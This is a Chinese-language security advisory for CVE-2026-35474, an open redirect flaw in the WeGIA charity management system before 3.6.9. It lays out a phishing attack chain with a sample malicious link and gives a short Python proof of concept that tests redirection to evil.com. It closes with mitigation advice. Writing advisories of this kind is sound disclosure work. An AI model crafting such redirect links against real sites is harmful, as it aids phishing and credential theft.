CVE-2026-35474 CVSS 6.1 中危

CVE-2026-35474 WeGIA开放重定向漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35474

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是一个用于慈善机构的Web管理系统。在3.6.9版本之前，该系统存在开放重定向安全漏洞。攻击者可以通过构造特定的恶意请求，利用未经验证的`redirect`参数，将用户重定向到任意不可信的网站。由于应用程序直接使用`$_GET`获取的参数值设置HTTP头部，未进行URL校验或白名单检查，可能导致钓鱼攻击。该问题已在3.6.9版本中修复。

技术细节

该漏洞的根本原因是WeGIA Web应用程序在处理重定向逻辑时，未能对用户输入的参数进行有效的安全验证。具体而言，应用程序直接从全局变量`$_GET`中读取`redirect`参数的值，并将其未经任何过滤或校验直接传递给PHP的`header("Location: ...")`函数。这种不安全的编程方式允许攻击者通过在URL中注入恶意地址（如`?redirect=http://evil.com`），诱导受害者点击。由于CVSS向量显示无需认证（PR:N）且需要用户交互（UI:R），攻击者通常利用此漏洞结合社会工程学进行网络钓鱼。当受害者访问看似合法的链接时，会被重定向至伪造的登录页面，从而窃取凭据或执行恶意操作。

攻击链分析

STEP 1

1. 攻击准备

攻击者确认WeGIA目标版本低于3.6.9，并准备好含有恶意重定向参数的URL（例如：http://target-site/login?redirect=http://attacker-site/phish）。

STEP 2

2. 投递链接

攻击者通过电子邮件或社交媒体将构造好的恶意链接发送给目标用户，利用社会工程学手段诱导用户点击。

STEP 3

3. 触发重定向

受害者点击链接，向WeGIA服务器发送请求。服务器端PHP脚本直接从$_GET获取redirect参数并无校验地执行header('Location: ...')。

STEP 4

4. 攻击生效

受害者的浏览器跟随重定向指令跳转至攻击者控制的恶意网站，导致凭证泄露或进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_open_redirect(url):
    """Check for Open Redirect vulnerability in WeGIA."""
    # Malicious target URL to test redirection
    evil_site = "https://evil.com"
    
    # The vulnerable parameter is 'redirect' based on the description
    full_url = f"{url}?redirect={evil_site}"
    
    try:
        # Send request without following redirects to catch the Location header
        response = requests.get(full_url, allow_redirects=False)
        
        if response.status_code == 302 or response.status_code == 301:
            location_header = response.headers.get('Location')
            if location_header and evil_site in location_header:
                print(f"[+] Vulnerability Confirmed! Redirecting to: {location_header}")
                return True
        
        print("[-] Vulnerability not detected.")
        return False
        
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

if __name__ == "__main__":
    target = "http://localhost/wegia/index.php" # Replace with actual target
    check_open_redirect(target)

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施

如果无法立即升级，建议在Web服务器层面（如Nginx或Apache）配置严格的URL重定向规则，拦截包含外部域名的重定向参数。同时，加强对用户的网络安全意识教育，警惕不明来源的跳转链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表